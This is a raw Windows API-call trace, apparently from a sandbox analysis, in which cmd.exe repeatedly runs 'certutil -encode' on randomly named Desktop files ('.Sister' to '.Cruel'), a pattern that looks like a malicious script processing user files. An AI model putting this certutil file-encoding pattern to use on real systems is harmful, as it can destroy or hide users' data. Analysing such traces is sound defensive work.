GetProcessHeap () returned 0x21ed8c70000 [0239.013] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8c78bb0 [0239.014] GetProcessHeap () returned 0x21ed8c70000 [0239.014] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c78bb0, Size=0x7e) returned 0x21ed8c78bb0 [0239.014] GetProcessHeap () returned 0x21ed8c70000 [0239.014] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c78bb0) returned 0x7e [0239.014] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0239.014] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0239.016] GetLastError () returned 0x2 [0239.016] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0239.016] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0239.017] GetLastError () returned 0x2 [0239.017] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0239.017] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cdc0 [0239.018] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0239.018] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.COM", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0239.018] GetLastError () returned 0x2 [0239.018] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.EXE", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cdc0 [0239.019] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0239.019] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0239.019] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0239.019] ??_V@YAXPEAX@Z () returned 0x1 [0239.019] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde70, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0239.107] InitializeProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa6cf4fdc80 | out: lpAttributeList=0xa6cf4fdd90, lpSize=0xa6cf4fdc80) returned 1 [0239.107] UpdateProcThreadAttribute (in: lpAttributeList=0xa6cf4fdd90, dwFlags=0x0, Attribute=0x60001, lpValue=0xa6cf4fdc6c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa6cf4fdd90, lpPreviousValue=0x0) returned 1 [0239.108] GetStartupInfoW (in: lpStartupInfo=0xa6cf4fdd20 | out: lpStartupInfo=0xa6cf4fdd20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0239.108] GetProcessHeap () returned 0x21ed8c70000 [0239.108] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8d45d10 [0239.108] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0239.108] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0239.108] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0239.108] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0239.108] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0239.108] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0239.108] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0239.108] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0239.108] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0239.108] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0239.108] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0239.109] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0239.109] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0239.109] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0239.109] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0239.109] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0239.109] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0239.109] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0239.109] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0239.109] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0239.109] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0239.109] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0239.109] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0239.109] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0239.109] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0239.109] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0239.109] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0239.109] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0239.110] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0239.110] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0239.110] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0239.110] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0239.110] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0239.110] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0239.110] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0239.110] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0239.110] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0239.110] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0239.110] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0239.110] GetProcessHeap () returned 0x21ed8c70000 [0239.110] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45d10) returned 1 [0239.110] GetProcessHeap () returned 0x21ed8c70000 [0239.110] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x12) returned 0x21ed8c95b80 [0239.111] lstrcmpW (lpString1="\\certutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0239.111] _get_osfhandle (_FileHandle=1) returned 0x50 [0239.111] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0239.196] _get_osfhandle (_FileHandle=0) returned 0x4c [0239.196] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0239.264] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\certutil.exe", lpCommandLine="certutil -encode \"NbugXFY9poFh8.gif.Sister\" \"NbugXFY9poFh8.gif.Cruel\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0xa6cf4fdcb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"NbugXFY9poFh8.gif.Sister\" \"NbugXFY9poFh8.gif.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa6cf4fdc88 | out: lpCommandLine="certutil -encode \"NbugXFY9poFh8.gif.Sister\" \"NbugXFY9poFh8.gif.Cruel\"", lpProcessInformation=0xa6cf4fdc88*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x134c, dwThreadId=0x1350)) returned 1 [0239.275] CloseHandle (hObject=0xa4) returned 1 [0239.275] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0239.275] GetProcessHeap () returned 0x21ed8c70000 [0239.275] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0130) returned 1 [0239.275] GetEnvironmentStringsW () returned 0x21ed93b0130* [0239.276] GetProcessHeap () returned 0x21ed8c70000 [0239.276] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed8d44660 [0239.276] FreeEnvironmentStringsA (penv="=") returned 1 [0239.276] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0240.975] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0xa6cf4fdc08 | out: lpExitCode=0xa6cf4fdc08*=0x0) returned 1 [0240.976] CloseHandle (hObject=0xa8) returned 1 [0240.976] _vsnwprintf (in: _Buffer=0xa6cf4fddd8, _BufferCount=0x13, _Format="%08X", _ArgList=0xa6cf4fdc18 | out: _Buffer="00000000") returned 8 [0240.976] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0240.979] GetProcessHeap () returned 0x21ed8c70000 [0240.980] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d44660) returned 1 [0240.980] GetEnvironmentStringsW () returned 0x21ed93b0130* [0240.980] GetProcessHeap () returned 0x21ed8c70000 [0240.980] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed8d44660 [0240.980] FreeEnvironmentStringsA (penv="=") returned 1 [0240.980] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0240.980] GetProcessHeap () returned 0x21ed8c70000 [0240.980] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d44660) returned 1 [0240.980] GetEnvironmentStringsW () returned 0x21ed93b0130* [0240.980] GetProcessHeap () returned 0x21ed8c70000 [0240.980] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed8d44660 [0240.980] FreeEnvironmentStringsA (penv="=") returned 1 [0240.980] GetProcessHeap () returned 0x21ed8c70000 [0240.980] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95b80) returned 1 [0240.980] DeleteProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90 | out: lpAttributeList=0xa6cf4fdd90) [0240.981] ??_V@YAXPEAX@Z () returned 0x1 [0240.981] FindNextFileW (in: hFindFile=0x21ed8c7cb20, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x794294b0, ftCreationTime.dwHighDateTime=0x1d5e2cc, ftLastAccessTime.dwLowDateTime=0xa2fbffa0, ftLastAccessTime.dwHighDateTime=0x1d5e7f7, ftLastWriteTime.dwLowDateTime=0xa2fbffa0, ftLastWriteTime.dwHighDateTime=0x1d5e7f7, nFileSizeHigh=0x0, nFileSizeLow=0xccc6, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="NMgihtIW4j90xeC_.mkv.Sister", cAlternateFileName="")) returned 1 [0240.981] GetProcessHeap () returned 0x21ed8c70000 [0240.981] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c78f20, Size=0x3f6) returned 0x21ed8c78f20 [0240.981] GetProcessHeap () returned 0x21ed8c70000 [0240.981] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c78f20) returned 0x3f6 [0240.981] GetProcessHeap () returned 0x21ed8c70000 [0240.981] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d69500 [0240.981] GetProcessHeap () returned 0x21ed8c70000 [0240.981] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d69500, Size=0x58) returned 0x21ed8d69500 [0240.981] GetProcessHeap () returned 0x21ed8c70000 [0240.981] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d69500) returned 0x58 [0240.981] GetProcessHeap () returned 0x21ed8c70000 [0240.981] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d69570 [0240.981] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0240.981] GetProcessHeap () returned 0x21ed8c70000 [0240.981] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x48) returned 0x21ed8c7bb20 [0240.981] ??_V@YAXPEAX@Z () returned 0x1 [0240.981] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0240.981] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7cf40 [0240.982] FindClose (in: hFindFile=0x21ed8c7cf40 | out: hFindFile=0x21ed8c7cf40) returned 1 [0240.982] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7ca60 [0240.982] FindClose (in: hFindFile=0x21ed8c7ca60 | out: hFindFile=0x21ed8c7ca60) returned 1 [0240.982] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xb9f60e80, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xb9f60e80, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7cdc0 [0240.982] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0240.982] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\NMgihtIW4j90xeC_.mkv.Sister", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x794294b0, ftCreationTime.dwHighDateTime=0x1d5e2cc, ftLastAccessTime.dwLowDateTime=0xa2fbffa0, ftLastAccessTime.dwHighDateTime=0x1d5e7f7, ftLastWriteTime.dwLowDateTime=0xa2fbffa0, ftLastWriteTime.dwHighDateTime=0x1d5e7f7, nFileSizeHigh=0x0, nFileSizeLow=0xccc6, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="NMgihtIW4j90xeC_.mkv.Sister", cAlternateFileName="NMGIHT~1.SIS")) returned 0x21ed8c7cdc0 [0240.983] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0240.983] _wcsnicmp (_String1="NMGIHT~1.SIS", _String2="NMgihtIW4j90xeC_.mkv.Sister", _MaxCount=0x1b) returned 21 [0240.983] malloc (_Size=0x1ff9c) returned 0x21ed97dfbb0 [0240.983] ??_V@YAXPEAX@Z () returned 0x21ed97dfbb0 [0240.983] GetProcessHeap () returned 0x21ed8c70000 [0240.983] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x3a) returned 0x21ed8c7bbc0 [0240.983] ??_V@YAXPEAX@Z () returned 0x1 [0240.983] ??_V@YAXPEAX@Z () returned 0x1 [0240.983] GetProcessHeap () returned 0x21ed8c70000 [0240.983] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d69570, Size=0x230) returned 0x21ed8d69570 [0240.983] GetProcessHeap () returned 0x21ed8c70000 [0240.983] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d69570) returned 0x230 [0240.983] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0240.983] _get_osfhandle (_FileHandle=1) returned 0x50 [0240.983] GetFileType (hFile=0x50) returned 0x2 [0240.983] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0240.983] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0240.985] _get_osfhandle (_FileHandle=1) returned 0x50 [0240.985] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0240.992] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0240.992] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0240.992] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0240.992] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0240.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0240.992] GetFileType (hFile=0x50) returned 0x2 [0240.992] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0240.992] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0240.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0240.993] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0240.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0240.993] GetFileType (hFile=0x50) returned 0x2 [0240.993] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0240.993] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0240.994] _get_osfhandle (_FileHandle=1) returned 0x50 [0240.994] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d69510*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x21ed8d69510*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x8) returned 1 [0240.994] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe588 | out: _Buffer=" -encode \"NMgihtIW4j90xeC_.mkv.Sister\" \"NMgihtIW4j90xeC_.mkv.Cruel\" ") returned 68 [0240.994] _get_osfhandle (_FileHandle=1) returned 0x50 [0240.994] GetFileType (hFile=0x50) returned 0x2 [0240.994] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0240.994] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe518 | out: lpMode=0xa6cf4fe518) returned 1 [0240.995] _get_osfhandle (_FileHandle=1) returned 0x50 [0240.995] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x44, lpNumberOfCharsWritten=0xa6cf4fe558, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe558*=0x44) returned 1 [0240.995] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0240.995] _get_osfhandle (_FileHandle=1) returned 0x50 [0240.995] GetFileType (hFile=0x50) returned 0x2 [0240.995] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0240.995] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0240.997] _get_osfhandle (_FileHandle=1) returned 0x50 [0240.997] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0241.001] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe300, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0241.002] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0241.002] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0241.002] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0241.002] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0241.002] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0241.002] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0241.002] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0241.002] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0241.002] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0241.002] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0241.002] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0241.002] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0241.002] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0241.002] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0241.003] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0241.003] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0241.003] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0241.003] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0241.003] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0241.003] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0241.003] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0241.003] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0241.003] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0241.003] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0241.003] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0241.003] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0241.003] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0241.003] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0241.003] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0241.003] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0241.003] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0241.003] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0241.003] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0241.003] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0241.003] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0241.003] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0241.003] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0241.003] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0241.003] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0241.004] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0241.004] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0241.004] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0241.004] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0241.004] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0241.004] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0241.004] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0241.004] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0241.004] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0241.004] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0241.004] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0241.004] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0241.004] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0241.004] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0241.004] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0241.004] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0241.004] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0241.004] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0241.004] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0241.004] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0241.004] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0241.004] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0241.004] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0241.004] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0241.004] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0241.004] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0241.004] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0241.005] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0241.005] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0241.005] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0241.005] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0241.005] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 